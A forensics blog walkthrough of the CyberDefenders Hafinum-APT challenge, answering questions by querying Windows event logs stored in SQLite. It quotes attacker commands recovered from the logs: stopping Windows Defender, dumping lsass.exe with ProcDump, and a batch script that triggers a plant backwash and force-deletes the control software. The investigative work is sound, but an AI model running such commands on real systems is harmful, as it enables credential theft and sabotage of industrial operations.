forensicskween

CyberDefenders: Hafinum-APT

Windows Event Logs Analysis Challenge, and I am happy to introduce my rebrand of my old script to make a sqlite database out of Windows Event Logs!!!

Information

Category Name: Hafinum-APT

Scenario:

You work as an incident responder for a consulting firm that specializes in digital forensics and incident response. You are assigned to investigate a security incident that occurred at a manufacturing plant that produces electronic components. The plant uses a variety of industrial control systems (ICS) to manage their production lines and other critical operations.

The security team at the plant detected suspicious network activity from an external IP address associated with the Hafnium threat actor group.

Your task is to investigate the incident and determine the extent of the compromise, the attacker’s objectives, and the potential impact on the plant’s operations. You have been provided with log files from the plant’s servers and workstations, which include Windows event logs and TeamViewer logs. You must analyze the logs and gather information about the attacker’s activity.

Files:
c83-HAFINUM.zip 5.03 GB
  – winevt.zip 15.2 MB
  – c83-Hafinum.ova 5.01 GB

My Recommendations

Download it from CyberDefenders and verify it with:

sha1sum /path/to/c83-HAFINUM.zip

SHA1SUM: 9c41911c6a0fbd11e198a37b0da0fe32156b0ba0

Walkthrough

For this challenge, I decided to upgrade an old script I wrote for the CyberCorp Case 1 challenge. This time, it’s faster and more efficient. I also dumped as many event descriptions as I could to populate the database. Makes things sooo much easier to analyze logs 😛 Here’s the link to the github repo. If you plan on using it, plssss make sure to install the dependencies first :))

				
					python3.11 evtx2db.py -i c83-Hafinum/winevt/Logs -o c83-Hafinum/out -e 
				
			

There are loads of events here, so the code runs a bit slowly. Here’s an example of the output database:

1. What is the name of the threat detected by Windows Defender?

Filtering the Provider column for ‘Defender’ and doing a global search for ‘threat’ returns four events that happened around the same time. All four report the same threat:

Looking at the Description column, Event ID 1116 and Event ID 1117 are the critical ones:

1116: ‘The antimalware platform detected malware or other potentially unwanted software.’
1117: ‘The antimalware platform has taken action to protect this machine from malware or other potentially unwanted software.’

Answer: Trojan:Win32/Ceprolad.A

2. What was the full URL that Windows Defender blocked an archive from being downloaded?

In the same Event Data as above, the Path is saved as:

"Path": "CmdLine:_C:\\Windows\\System32\\certutil.exe -urlcache -split -f https://download.sysinternals.com/files/Procdump.zip"

3. What was the full command used by the attacker to successfully download the archive?

So to find the successful download, we can apply three filters:

  • filter the EventData column for http://
  • filter the Description column for ‘create’
  • filter everything for procdump

With these filters, two logs are returned, both from Sysmon. The CommandLine arguments look identical at first glance, but they differ. Logically, the successful one should be the more recent one.

2021-03-12 08:22:34

2021-03-12 08:23:47

They look the same, except that in the second one the closing double quote has been moved to the end of the URL, so the output filename is no longer part of the quoted string.

Answer: certutil.exe -urlcache -split -f “https://download.sysinternals.com/files/Procdump.zip” procdump.zip

4. Which user account was the attacker using when the archive was successfully downloaded to the host?

Looking at the same event, the User field is Administrator:

Answer: Administrator
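Here is what the filters from questions 1, 3 and 4 look like when run as SQL against such a database. This is an added example, not the evtx2db script itself: it parses a few constructed EVTX-XML records (not the challenge logs) into an in-memory SQLite table with the same kind of columns, then applies the Provider, EventID and EventData filters described above.

```python
import json
import sqlite3
import xml.etree.ElementTree as ET
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
EVT = ('<Event xmlns="%s"><System><Provider Name="{p}"/><EventID>{id}</EventID>'
       '<TimeCreated SystemTime="{ts}"/><EventRecordID>{rid}</EventRecordID></System>'
       '<EventData>{data}</EventData></Event>') % NS["e"]
DATA = '<Data Name="{n}">{v}</Data>'
URL = "https://download.sysinternals.com/files/Procdump.zip"
# Constructed records (not the challenge logs): a Defender 1116 detection plus the two
# Sysmon process-creation events whose command lines the walkthrough compares.
SAMPLE_XML = [
    EVT.format(p="Microsoft-Windows-Windows Defender", id=1116, ts="2021-03-12 08:22:30",
               rid=10, data=DATA.format(n="Threat Name", v="Trojan:Win32/Ceprolad.A")),
    EVT.format(p="Microsoft-Windows-Sysmon", id=1, ts="2021-03-12 08:22:34", rid=11,
               data=DATA.format(n="User", v="WIN\\Administrator") + DATA.format(
                   n="CommandLine", v=f'certutil.exe -urlcache -split -f "{URL} procdump.zip"')),
    EVT.format(p="Microsoft-Windows-Sysmon", id=1, ts="2021-03-12 08:23:47", rid=12,
               data=DATA.format(n="User", v="WIN\\Administrator") + DATA.format(
                   n="CommandLine", v=f'certutil.exe -urlcache -split -f "{URL}" procdump.zip')),
]
def parse(xml_text):  # flatten one EVTX record into the columns evtx2db-style tools keep
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    data = {d.get("Name"): d.text for d in root.findall("e:EventData/e:Data", NS)}
    return (int(system.findtext("e:EventRecordID", namespaces=NS)),
            system.find("e:TimeCreated", NS).get("SystemTime"), system.find("e:Provider", NS).get("Name"),
            int(system.findtext("e:EventID", namespaces=NS)), json.dumps(data))

def load(records):  # in-memory stand-in for the SQLite file the script writes
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE events (record_id INTEGER PRIMARY KEY, ts TEXT, "
                 "provider TEXT, event_id INTEGER, event_data TEXT)")
    conn.executemany("INSERT INTO events VALUES (?,?,?,?,?)", map(parse, records))
    return conn

def defender_threats(conn):  # Q1: the threat named by Defender 1116/1117 events
    rows = conn.execute("SELECT event_id, event_data FROM events WHERE provider LIKE "
                        "'%Defender%' AND event_id IN (1116, 1117) ORDER BY record_id")
    return [(eid, json.loads(ed).get("Threat Name")) for eid, ed in rows]

def latest_download(conn, needle="procdump"):  # Q3/Q4: newest Sysmon process creation fetching `needle`
    row = conn.execute("SELECT ts, event_data FROM events WHERE provider LIKE '%Sysmon%' "
                       "AND event_id = 1 AND event_data LIKE '%http%' AND event_data LIKE ? "
                       "ORDER BY ts DESC LIMIT 1", (f"%{needle}%",)).fetchone()
    if row is None:
        return None
    data = json.loads(row[1])
    # return timestamp, the exact command line, and the user without its domain prefix
    return row[0], data["CommandLine"], data["User"].split("\\")[-1]
```

Note that `LIKE '%http%'` rather than `'%http://%'` is used so that an https:// URL also matches.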

5. What command was used by the attacker on the host to try and disable Windows Defender via the command line?

So we need to filter for dates occurring after the 11th of March. An easy way to stop Windows Defender from the command line without using PowerShell is Service Control (sc), which is what the attacker used:

Answer: sc stop WinDefend

6. Provide the date and time when Windows Defender's real-time protection was disabled.

SO satisfying. I filtered Descriptions for ‘disabled‘ and Filename for ‘Defender’, and only one record popped up. It is event ID 5001, whose description is ‘Real-time Protection scanning for malware and other potentially unwanted software was disabled.’ The exact timestamp is 2021-03-12 08:21:35.

Answer: 2021-03-12 08:21:35

7. Which version of ProcDump did the attacker run on the host?

Filtering for ‘version’ in the EventData column and procdump.exe globally, I get 3 records: two with event ID 1 (Process Create) and one with event ID 10 (Registry Value Set). All three logs show that the version is 10.0.

Answer: 10.0

8. Where is the executable located on the disk that was targeted by Procdump to dump its process memory?

Keeping the same filter as question 7, the events with ID 1 have a CommandLine:

The other event has the same CommandLine except it is using procdump64.exe. Procdump tried to dump lsass.exe. The executable is located at C:\Windows\System32\lsass.exe.

Answer: C:\Windows\System32\lsass.exe.

9. What was the location of the dump file created from the process dumped with Procdump?

If we look above, the current directory is set to C:\tmp and the output file is lsass.dmp. We can filter the EventData column for lsass.dmp to confirm, just in case. A new event with ID 11 (File Create) shows that it was indeed saved to the tmp directory. The executable responsible for that is procdump64.exe.

Answer: C:\tmp\lsass.dmp

10. Provide the SHA256 hash value of the Teamviewer installation to check if the legitimate version was installed.

This is a bit of a trick question. If we filter for sha256 in the EventData column and TeamViewer overall, there are 76 results. Six are for event ID 15, ‘File Stream Created’, which is not what we need. The TeamViewer installation must have gone through event ID 11 (File Created). Filtering for that, plus ‘install’ in the EventData column, may give us the installation path, which will make it easier to find its hash:

So we know the path of the image. Now, filtering for sha256 and ‘TeamViewer_.exe’ there are four results. The question asks about installation and the event with record ID 4362 is an install:

In red is the CommandLine showing that this is the installation of Teamviewer. In yellow, it’s the filepath we found before, and in pink, the sha256 hash.

Answer: D256F177A3DD8E7346B3FA9D32C4690B611F104E7CE175E99C5757BE6EEF229B

11. What was the domain looked up in the first DNS query done by the TeamViewer application after it was installed?

So we found that TeamViewer was installed at 2021-03-10 04:40:22. We can filter the ‘Description’ column for ‘DNS Query‘ and the Timestamp with ‘2021-03-10 04:4‘. The first query done by TeamViewer is eventRecordID 4394:

At 2021-03-10 04:40:52.

Answer: router7.teamviewer.com

12. Determine how the attacker gained access to the Administrator account.

Pretty straightforward. Filtering Descriptions for ‘Account failed to log’ (event ID 4625), there are 1004 events, all from the same IP address, all trying the Administrator account.

Answer: Brute-force attack

13. What IP address can we send to the Firewall team for blocking?

The IP address associated with the brute-force attack is 8.36.216.58:

Answer: 8.36.216.58

14. What was the hostname from where the attacker launched their attack?

In the same Events as the previous questions, all of them have the same ‘WorkstationName’, which is the hostname – ‘FancyPoodle’.

Answer: FancyPoodle

15. Provide the first timestamp from the logs where you can see the attacker was successful login.

This time, we can filter Descriptions for ‘logged on’ and EventData for ‘FancyPoodle’; the first successful logon was on 2021-03-11 at 20:26:52.

Answer: 2021-03-11 20:26:52
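The reasoning behind questions 12 to 15 (many 4625 failures from one source, then the first 4624 from that same source) as a pair of queries. This is an added example rather than code from the original post; the logon rows are constructed to mimic the 4625/4624 EventData fields (the IP and WorkstationName are the ones found above), not read from the challenge logs.

```python
import sqlite3

def build_sample():
    """Constructed logon records (not the challenge logs): 60 failures from one source
    in six minutes, a lone unrelated failure, a benign success, then the attacker's."""
    rows = [(5000 + i, f"2021-03-11 20:2{i // 10}:{(i % 10) * 6:02d}", 4625,
             "Administrator", "8.36.216.58", "FancyPoodle") for i in range(60)]
    rows += [(5060, "2021-03-11 20:24:10", 4625, "jsmith", "10.0.0.7", "HR-PC"),
             (5061, "2021-03-11 19:02:00", 4624, "svc_backup", "10.0.0.9", "BACKUP01"),
             (5062, "2021-03-11 20:26:52", 4624, "Administrator", "8.36.216.58", "FancyPoodle")]
    return rows

def load(rows):  # columns mirror the 4625/4624 EventData fields the walkthrough filters on
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE logons (record_id INTEGER PRIMARY KEY, ts TEXT, event_id INTEGER, "
                 "target_user TEXT, ip TEXT, workstation TEXT)")
    conn.executemany("INSERT INTO logons VALUES (?,?,?,?,?,?)", rows)
    return conn

def brute_force_sources(conn, threshold=20):
    """Q12-14: sources with at least `threshold` failed logons (4625), with the account
    they targeted, the WorkstationName they advertised and the first/last attempt."""
    return conn.execute(
        "SELECT ip, workstation, target_user, COUNT(*) AS failures, MIN(ts), MAX(ts) "
        "FROM logons WHERE event_id = 4625 GROUP BY ip, workstation, target_user "
        "HAVING COUNT(*) >= ? ORDER BY failures DESC", (threshold,)).fetchall()

def first_success_after_failures(conn, ip):
    """Q15: earliest 4624 from `ip` that follows that source's first 4625, or None."""
    return conn.execute(
        "SELECT ts, target_user FROM logons WHERE event_id = 4624 AND ip = ? "
        "AND ts > (SELECT MIN(ts) FROM logons WHERE event_id = 4625 AND ip = ?) "
        "ORDER BY ts LIMIT 1", (ip, ip)).fetchone()
```

The second query deliberately ignores successes that predate the first failure, so a legitimate earlier logon from the same address would not be mistaken for the attacker's.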

16. Provide the date in UTC time of when the attacker successfully logged into the host using RDP for the first time.

To filter for RDP events, first filter the Provider column for ‘LocalSessionManager‘. Then, filter for ‘logon succeeded’, or event ID 21.

Looking at the timestamps, it makes sense that the first successful RDP logon came after the Administrator account was brute-forced, meaning the closest timestamp after the previous date is 2021-03-12 08:03:02.

Answer: 2021-03-12 08:03:00

17. When did the attacker log off from the first RDP session?

Doing the opposite of the previous question: filter the Description column for ‘logoff’ while keeping the Provider filter. Next, filter the timestamps for the date 2021-03-12:

The first logoff was at 08:45:02.

Answer: 2021-03-12 08:45:02

18. What command did the attacker run on the host which would've helped him understand what Antivirus software was running on the system?

This one took a while, but I eventually went digging into Red Team cheat sheets. In this one, there is a list of commands to run for Defender. Checking every single one of them, occurring after the 11th, tasklist was executed twice:

Answer: tasklist

19. Which command did the attacker run on the host that would have helped him understand the network interface configuration of the host?

Finding executed commands means we can filter for ‘Process Create’ in Descriptions, or event ID 1. We can simply search for common commands. Eventually, there is evidence of ‘ipconfig /all’ having been executed after the attacker compromised the machine:

Answer: ipconfig /all

20. What was the name of the user account added by the attacker?

The event ID for a new user being added is 4720. If we filter for that, we will find four events. BUT, only two occur after the machine was compromised:

The target username is Administrator1.

Answer: Administrator1

21. Based on information from the public, the first visual signs of raw sewage spilling into the river from the plant were around 14:00 local time on March 12th, 2021. According to the plant technicians, it would take at least 45 minutes for the plant to excrete sewage into the river once the backwash mode was activated. A file was created on the system that matches the above timelines and, based on its content, could likely have been used by the attackers to initiate the plant backwash. What was the name of this file?

First of all, finding the timezone (better late than never!). The logs say that the TimezoneBiasHour is -8, but that doesn’t seem right. After doing some research, the event ID that can help narrow it down is 6013. Filtering for the given date, there is the following:

The event ID actually logs how long the system has been running since boot. UTC is 2 hours behind South Africa Standard Time, so we need to look at timestamps around 12:00 – 14:00 in UTC.

To find the file that was created, we can filter Descriptions for ‘File Created’ and the date for ‘2021-03-12 1’. There are 39 logged events. The first three events show how a file named ‘backwash.bat’ was downloaded with Chrome:

I’m guessing I messed up the Timezone conversion…

Answer: backwash.bat

22. Which application was responsible for downloading the malicious file to the host?

As shown above, the file was downloaded via Chrome.

Answer: chrome.exe

23. From which website was this malicious file downloaded?

Now that we have a concrete timestamp, we can remove the Description filters and keep the date as ‘2021-03-12 11:09’. Out of the 9 logs, event RecordID 12134 has the ‘ReferrerUrl’ in its Contents:

Answer: wetransfer.com

24. After this file was downloaded, the attacker appeared to have moved it to another directory on the host. What was the new path of the file?

Reversing again: filtering the descriptions for ‘File Created’ and keeping the same Timestamp filter, the file was moved to the root of the C: drive:

Answer: C:\backwash.bat

25. Based on the available logs, there are limited indications that the downloaded malicious file was executed on the host. Provide the earliest timestamp which shows proof of the file being executed on the host.

At this point, we can just filter EventData for the filename. The full contents of the file are shown in EventRecordID 12130:

start "C:\Program Files\ifak\SIMBA#4.3\Simba.exe --function backwash --interruptable no"
timeout /t 30 /nobreak
taskkill /F /IM simba.exe /T
taskkill /F /IM simba.exe /T
taskkill /F /IM simba.exe /T
taskkill /F /IM simba.exe /T
taskkill /F /IM simba.exe /T
DEL /F /Q "C:\Program Files\ifak\SIMBA#4.3\*"

So Simba is a wastewater engineering simulation program. The function backwash is started, and then the script runs:
– timeout
– taskkill
Timeout occurs first. We know the file was downloaded at around 11:08 AM. If we filter Timestamps for ‘2021-03-12 11:‘ and Description for ‘Process Create‘, and scroll scroll scroll, at 11:10:03 ‘timeout.exe’ was executed, with the exact same CommandLine as the contents of the file:

The event right before that is for cmd.exe, also at 11:10:03. The next event, exactly 30 seconds later, is for taskkill, so we are clearly watching the logs of the file being executed.

Answer: 2021-03-12 11:10:03

26. What command contained in the malicious file, if successfully run on the host, would you expect to have initiated the plant’s backwash mode?

The first part of the script, which calls the backwash function:

C:\Program Files\ifak\SIMBA#4.3\Simba.exe --function backwash --interruptable no

Answer: C:\Program Files\ifak\SIMBA#4.3\Simba.exe --function backwash --interruptable no

27. Prior to switching to a manual override, the technicians attempted to open the modified Simba plant simulation software application in order to stop the backwash sequence. However, they could not get the application to launch. What command from the attacker's script would have rendered the application unusable?

The last part of the script deletes the entire Simba directory under Program Files, so it would not have been possible to use the application:

DEL /F /Q "C:\Program Files\ifak\SIMBA#4.3\*"

Answer: DEL /F /Q “C:\Program Files\ifak\SIMBA#4.3\*”
